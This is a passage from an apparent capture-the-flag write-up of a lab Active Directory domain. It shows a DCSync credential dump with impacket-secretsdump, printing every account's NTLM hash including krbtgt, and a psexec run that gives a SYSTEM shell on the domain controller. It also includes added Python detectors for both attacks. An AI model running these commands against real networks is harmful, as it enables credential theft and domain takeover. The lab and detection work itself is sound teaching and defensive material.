DCSync


The password spray showed that almost every user in the domain shares the same password, including the Domain Admin (DA) user, choco.l. Using that account's Kerberos ticket, impacket-secretsdump pulls the domain credentials over DRSUAPI:

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ KRB5CCNAME=choco.l@dc.university.htb.ccache impacket-secretsdump UNIVERSITY.HTB/@dc.university.htb -k -no-pass -dc-ip $IP  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x7704a47762a8cd07d2922fc3e97e02a4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e1ab6bc4d7d84111fe3e0fb271de1e0b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
UNIVERSITY\DC$:plain_password_hex:e97478a1793c33f8f9a11b182653d4c9e62c86d8b6e0a3d73196a9470144a56d3e5c1e9db75e8cc6b580e95a6a5094ef929ea1ede9ac3c890d2103cc2babc001c6bc6d1f501bf69f293b2edd261e6d2a78f7f548efb1bdaf579ff29aada34007b64f40324cedbe67ad19e78760883f63198000caff9ad2f4606b7ebdd8aa2c6c3d573fc3dec04ad378f3e9c00e0017b907bc227daa76db77910961120fc47e8fe605532a350a3096442e2efd4a6227f049c221f8e4a0b27d5bade63d7605438fd088e788815524c8484d2ec7fc11c2ea0a98ca014f819afee1a3da79cd9ea29662456e1006e9460201a6757f46759d18
UNIVERSITY\DC$:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x44e8899b6f107411270e6b698b1cfde82435f5c4
dpapi_userkey:0x0616b9ece51544c0f81f1c19a4cb7812aee0feb6
[*] NL$KM 
 0000   88 46 0A 2B AA 91 13 80  6D 4A AD D2 F2 50 9C 46   .F.+....mJ...P.F
 0010   7D 95 DC 66 C9 3C 55 2F  92 18 48 6C DB 31 BE 07   }..f.<U/..Hl.1..
 0020   67 23 06 25 47 36 40 FC  4E 03 EC E7 CB C4 28 F8   g#.%G6@.N.....(.
 0030   00 67 45 08 B9 31 29 E4  E6 9F 6D 5B 07 F7 96 09   .gE..1)...m[....
NL$KM:88460a2baa9113806d4aadd2f2509c467d95dc66c93c552f9218486cdb31be0767230625473640fc4e03ece7cbc428f800674508b93129e4e69f6d5b07f79609
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e63413bab01a0b8820983496c0be3a9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c4599e48661690fa6538fe96d366de:::
university.htb\John.D:1103:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
university.htb\George.A:1104:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
WAO:1106:aad3b435b51404eeaad3b435b51404ee:da49675b9d3d5e403fa3c1c6b5c3f5a2:::
university.htb\hana:1107:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
karma.watterson:1108:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Alice.Z:1109:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Steven.P\Steven.P:1110:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Karol.J\Karol.J:1111:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Leon.K\Leon.K:1112:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Anna.C\A.Crouz:1113:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kai.K\Kai.K:1114:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Arnold.G\Arnold.G:1115:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kareem.A\Kareem.A:1116:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Lisa.K\Lisa.K:1117:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Jakke.C\Jakken.C:1118:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Nya.R\Nya.R:1119:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Brose.W\Brose.W:1120:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Choco.L\Choco.L:1121:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Rose.L\Rose.L:1122:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Emma.H\Emma.H:1123:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
C.Freez\C.Freez:1124:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Martin.T\Martin.T:1127:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
William.B\William.B:1132:aad3b435b51404eeaad3b435b51404ee:a910f374f7e63717f112fb4e40122a7c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
WS-3$:1134:aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34:::
GMSA-PClient01$:1140:aad3b435b51404eeaad3b435b51404ee:e5799ed7c404dead98cbe2fc610b9b1f:::
WS-1$:1141:aad3b435b51404eeaad3b435b51404ee:c23b84b12d7f2c758e4ca7da5b053c81:::
WS-2$:1142:aad3b435b51404eeaad3b435b51404ee:bfd5d3a7883cb6e0a63a29d0cdfd430c:::
WS-4$:1143:aad3b435b51404eeaad3b435b51404ee:c591cf4bcad09cc0eb5ba2b54e58b217:::
WS-5$:1144:aad3b435b51404eeaad3b435b51404ee:7427ac9458a4a39f5076ab080b1329b3:::
LAB-2$:1145:aad3b435b51404eeaad3b435b51404ee:93b3bf5940c921c6f072961d10c3f43f:::
[*] Kerberos keys grabbed
[*] Cleaning up... 

Domain Level Compromise
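
On the defensive side, the DRSUAPI replication above is visible on the DC as Security event 4662 carrying the replication control-access right GUIDs. The following is an added example, not part of the original write-up: it flags those events when the caller is not an expected replication principal. It assumes Directory Service Access auditing is enabled; the helper names and the sample events are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Control-access rights a caller must hold to pull secrets over DRSUAPI.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

def parse_4662(xml_text):
    """Return (subject_user, replication_rights) for a 4662 event, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4662":
        return None
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    guids = (g.lower() for g in GUID_RE.findall(data.get("Properties", "")))
    return data.get("SubjectUserName", ""), {REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS}

def find_dcsync(events, expected=("DC$",)):
    """Map each unexpected account to the replication rights it exercised."""
    allowed = {name.lower() for name in expected}  # DCs and sync service accounts
    hits = {}
    for xml_text in events:
        parsed = parse_4662(xml_text)
        if parsed and parsed[1] and parsed[0].lower() not in allowed:
            hits.setdefault(parsed[0], set()).update(parsed[1])
    return hits

def sample_event(event_id, user, properties):
    """Constructed, minimal event XML; real 4662 events carry many more fields."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f'<EventData><Data Name="SubjectUserName">{user}</Data>'
            f'<Data Name="Properties">{properties}</Data></EventData></Event>')

# Constructed sample: DC replication, a user doing the same, an unrelated 4662, a logon.
SAMPLE = [
    sample_event(4662, "DC$", "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    sample_event(4662, "Choco.L", "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    sample_event(4662, "Choco.L", "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    sample_event(4662, "John.D", "{00000000-0000-0000-0000-000000000001}"),
    sample_event(4624, "Choco.L", ""),
]

if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE).items():
        print(f"possible DCSync by {user}: {sorted(rights)}")
```

The `expected` list should hold every domain controller machine account plus any directory-sync service account that legitimately replicates.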

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ KRB5CCNAME=choco.l@dc.university.htb.ccache impacket-psexec UNIVERSITY.HTB/@dc.university.htb -k -no-pass -dc-ip $IP  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on dc.university.htb.....
[*] Found writable share ADMIN$
[*] Uploading file nAlKTeRa.exe
[*] Opening SVCManager on dc.university.htb.....
[*] Creating service fQOw on dc.university.htb.....
[*] Starting service fQOw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter vEthernet (Internal-VSwitch1):
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
   IPv4 Address. . . . . . . . . . . : 192.168.99.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::ea3:fdc0:ca7d:1115
   Link-local IPv6 Address . . . . . : fe80::c7da:e232:b312:1a1f%4
   IPv4 Address. . . . . . . . . . . : 10.10.11.39
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%4
                                       10.10.10.2

System Level Compromise on the dc.university.htb host
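
The psexec run above leaves two correlated traces on the DC: a file written to the root of ADMIN$ and a new service whose binary is that same file. The following is an added example, not part of the original write-up: it pairs event 5145 (detailed file share auditing) with event 7045 (service installed) on the file name. The function name, the dict layout, the source addresses and the timestamps are constructed; it assumes both event sources are collected and already parsed.

```python
import ntpath

FILE_WRITE_DATA = 0x2  # write bit in the 5145 AccessMask

def correlate_service_installs(events):
    """Pair files written to the ADMIN$ root (5145) with services that run them (7045)."""
    uploads, findings = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 5145:
            name = ev["RelativeTargetName"]
            wrote = int(ev["AccessMask"], 16) & FILE_WRITE_DATA
            if ev["ShareName"].upper().endswith("\\ADMIN$") and wrote and "\\" not in name:
                uploads[name.lower()] = (ev["SubjectUserName"], ev["IpAddress"])
        elif ev["id"] == 7045:
            binary = ntpath.basename(ev["ImagePath"].strip('"')).lower()
            if binary in uploads:  # service binary was uploaded over SMB earlier
                user, ip = uploads[binary]
                findings.append({"service": ev["ServiceName"], "binary": binary,
                                 "user": user, "source_ip": ip})
    return findings

# Constructed events. File and service names are the ones in the psexec output above;
# everything else (addresses, timestamps, the benign entries) is a placeholder.
SAMPLE = [
    {"time": 1, "id": 5145, "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "nAlKTeRa.exe",
     "AccessMask": "0x2", "SubjectUserName": "Choco.L", "IpAddress": "192.0.2.10"},
    {"time": 2, "id": 7045, "ServiceName": "fQOw", "ImagePath": r"%systemroot%\nAlKTeRa.exe"},
    {"time": 3, "id": 5145, "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "win.ini",
     "AccessMask": "0x1", "SubjectUserName": "John.D", "IpAddress": "192.0.2.20"},
    {"time": 4, "id": 7045, "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe"'},
]

if __name__ == "__main__":
    for f in correlate_service_installs(SAMPLE):
        print(f"service {f['service']} runs {f['binary']} uploaded by {f['user']} from {f['source_ip']}")
```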